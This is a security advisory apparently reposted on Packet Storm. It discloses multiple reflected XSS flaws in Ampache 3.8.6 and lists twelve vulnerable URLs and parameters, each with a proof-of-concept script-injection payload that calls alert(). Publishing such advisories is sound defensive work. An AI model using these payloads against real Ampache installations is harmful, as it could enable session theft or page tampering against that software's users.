exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Ampache 3.8.6 Cross Site Scripting

Ampache 3.8.6 Cross Site Scripting
Posted Jan 9, 2019
Authored by Zekvan Arslan | Site netsparker.com

Ampache version 3.8.6 suffers from multiple cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
SHA-256 | 0df6202d2e2ba7b2b3a388c00adfd7cc731f5b2afe54c067226bae1ab49cf904

Ampache 3.8.6 Cross Site Scripting

Change Mirror Download
Multiple Reflected Cross-site Scripting Vulnerabilities in Ampache 3.8.6

Information
--------------------

Advisory by Netsparker
Name: Multiple Reflected Cross-site Scripting in Ampache 3.8.6
Affected Software: Ampache
Affected Versions: 3.8.6
Homepage: http://ampache.org
Vulnerability: Reflected Cross-site Scripting
Severity: Medium
Status: Not Fixed
CVSS Score (3.0): CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L
Netsparker Advisory Reference: NS-18-046

Technical Details
--------------------

URL: http://{DOMAIN}/{PATH-OF-AMPACHE}/arts.php?action=find_art&object_type=live_stream&object_id='"--></style></scRipt><scRipt>alert(0x031B4B)</scRipt>&burl=http://www.example.com&artist_name=Smith&album_name=Smith&cover=3
Parameter Type: GET
Parameter Name: mbid
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x031B4B)</scRipt>

URL: http://{DOMAIN}/{PATH-OF-AMPACHE}/artists.php?action=show_missing&mbid='+alert(0x003D85)+'
Parameter Type: GET
Parameter Name: mbid
Attack Pattern: '+alert(0x003D85)+'

URL: http://{DOMAIN}/{PATH-OF-AMPACHE}/arts.php?action=find_art&object_type=album&object_id="><scRipt>alert(9)</scRipt>&burl=&artist_name=&album_name=&cover=
Parameter Type: GET
Parameter Name: object_id
Attack Pattern: "><scRipt>alert(9)</scRipt>

URL: http://{DOMAIN}/{PATH-OF-AMPACHE}/arts.php?action=find_art&object_type=live_stream&object_id="><scRipt>alert(9)</scRipt>&burl=&artist_name=&album_name=&cover=
Parameter Type: GET
Parameter Name: object_id
Attack Pattern: "><scRipt>alert(9)</scRipt>

URL: http://{DOMAIN}/{PATH-OF-AMPACHE}/random.php?action=get_advanced&type=song
Parameter Type: POST
Parameter Name: rule_1
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x013D4D)</scRipt>

URL: http://{DOMAIN}/{PATH-OF-AMPACHE}/random.php?action=get_advanced&type=song
Parameter Type: POST
Parameter Name: rule_1_input
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x013D4D)</scRipt>

URL: http://{DOMAIN}/{PATH-OF-AMPACHE}/random.php?action=get_advanced&type=song
Parameter Type: POST
Parameter Name: rule_1_subtype
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x013D4D)</scRipt>

URL: http://{DOMAIN}/{PATH-OF-AMPACHE}/search.php?type=song
Parameter Type: POST
Parameter Name: rule_1_input
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x003A1E)</scRipt>

URL: http://{DOMAIN}/{PATH-OF-AMPACHE}/search.php?type=song
Parameter Type: POST
Parameter Name: rule_1
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x003A1E)</scRipt>

URL: http://{DOMAIN}/{PATH-OF-AMPACHE}/smartplaylist.php?action=update_playlist&playlist_id=8
Parameter Type: POST
Parameter Name: rule_1
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x01DFF5)</scRipt>

URL: http://{DOMAIN}/{PATH-OF-AMPACHE}/smartplaylist.php?action=update_playlist&playlist_id=8
Parameter Type: POST
Parameter Name: rule_1_input
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x01DFF5)</scRipt>

URL: http://{DOMAIN}/{PATH-OF-AMPACHE}/smartplaylist.php?action=update_playlist&playlist_id=8
Parameter Type: POST
Parameter Name: rule_1_subtype
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x01DFF5)</scRipt>

For more information on cross-site scripting vulnerabilities read the article Cross-site Scripting (XSS).

Advisory Timeline
--------------------

12th November 2018- First Contact Attempt
9th January 2019 - Advisory Released

Credits & Authors
--------------------

These issues have been discovered by Zekvan Arslan while testing Netsparker Web Application Security Scanner.

About Netsparker
--------------------

Netsparker web application security scanners find and report security flaws and vulnerabilities such as SQL Injection and Cross-site Scripting (XSS) in all websites and web applications, regardless of the platform and technology they are built on. Netsparker scanning engineas unique detection and exploitation techniques allow it to be dead accurate in reporting vulnerabilities. The Netsparker web application security scanner is available in two editions; Netsparker Desktop and Netsparker Cloud. Visit our website https://www.netsparker.com for more information.

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close